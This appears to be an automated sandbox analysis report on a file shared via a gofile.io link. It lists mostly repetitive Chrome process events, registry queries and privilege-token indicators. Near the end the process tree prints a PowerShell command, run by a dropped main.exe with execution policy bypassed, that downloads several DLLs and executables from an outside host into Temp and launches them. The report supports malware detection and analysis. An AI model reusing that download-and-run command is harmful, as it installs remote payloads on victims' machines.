hxxps://gofile[.]io/d/y09QNf

Analysis

max time kernel
1799s
max time network
1687s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
23/04/2023, 18:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/y09QNf

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4824	main.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133267544474738974"	chrome.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3640	chrome.exe
3640	chrome.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
3640	chrome.exe
3640	chrome.exe
2788	chrome.exe
2788	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 44 IoCs

pid	Process
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe
Token: SeCreatePagefilePrivilege	3640	chrome.exe
Token: SeShutdownPrivilege	3640	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe
3640	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3640 wrote to memory of 3648	3640	chrome.exe	66
PID 3640 wrote to memory of 3648	3640	chrome.exe	66
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1016	3640	chrome.exe	68
PID 3640 wrote to memory of 1504	3640	chrome.exe	69
PID 3640 wrote to memory of 1504	3640	chrome.exe	69
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70
PID 3640 wrote to memory of 4316	3640	chrome.exe	70

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://gofile.io/d/y09QNf
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0x88,0xd8,0x7ffe357f9758,0x7ffe357f9768,0x7ffe357f9778
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:2
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1716 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4628 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3176 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:3404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5004 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4916 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5304 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6244 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6488 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:4036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6244 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5092 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:8
  2⤵
  PID:1952
- C:\Users\Admin\Downloads\main.exe
  "C:\Users\Admin\Downloads\main.exe"
  2⤵
  - Executes dropped EXE
  PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "$base_url = "https://cdn-1.thughunter.repl.co/cdn/" $download_path = "C:\Users\Admin\AppData\Local\Temp\" $files = "libcurl-x64.def", "libcurl-x64.dll", "libgcc_s_seh-1.dll", "libsodium-23.dll", "libsodium-24.def", "sqlite3.def", "sqlite3.dll", "main.exe", "nagogy-multi-tool.exe" foreach ($file in $files) { $url = $base_url + $file $output = $download_path + $file Start-BitsTransfer -Source $url -Destination $output } Start-Process -FilePath "$download_path\main.exe" Start-Process -FilePath "$download_path\nagogy-multi-tool.exe" "
    3⤵
    PID:524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -Command "$base_url = "https://cdn-1.thughunter.repl.co/cdn/"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5100 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6884 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6864 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6608 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6580 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6404 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5512 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=7408 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5928 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:4304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7384 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=8360 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=8296 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=8244 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=8312 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=8676 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=8704 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=9028 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=9168 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8500 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=9444 --field-trial-handle=1924,i,9789506059205251381,4328936121983157411,131072 /prefetch:1
  2⤵
  PID:5488
- C:\Program Files\Google\Chrome\Application\chrome.exe
